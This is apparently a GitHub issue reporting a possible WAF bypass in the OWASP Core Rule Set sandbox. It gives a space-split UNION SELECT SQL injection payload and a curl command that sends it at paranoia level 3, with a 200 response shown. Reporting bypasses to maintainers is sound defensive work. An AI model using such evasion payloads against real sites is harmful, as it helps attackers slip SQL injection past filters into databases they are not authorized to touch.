SQL Injection bypass WAF #4191

@HackingRepo

Hello, world. I tried the payload uni on sel ect 1,2,3,4,5 with paranoia level 3 and I see 200. I tried with:

curl -ig -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level: 3" -H "x-backend: coraza-caddy" --data-urlencode "q=uni on sel ect 1,2,3,4,5" "https://sandbox.coreruleset.org/"
HTTP/1.1 200 OK
Date: Wed, 09 Jul 2025 10:42:22 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
X-Unique-ID: aG5Hjg3ZsEJGA-19Uz88PAAAANY
x-backend: invalid, fallback to apache-latest
x-crs-last-commit: none

The impact of this can be that an attacker bypasses the WAF and exploits SQL injection.
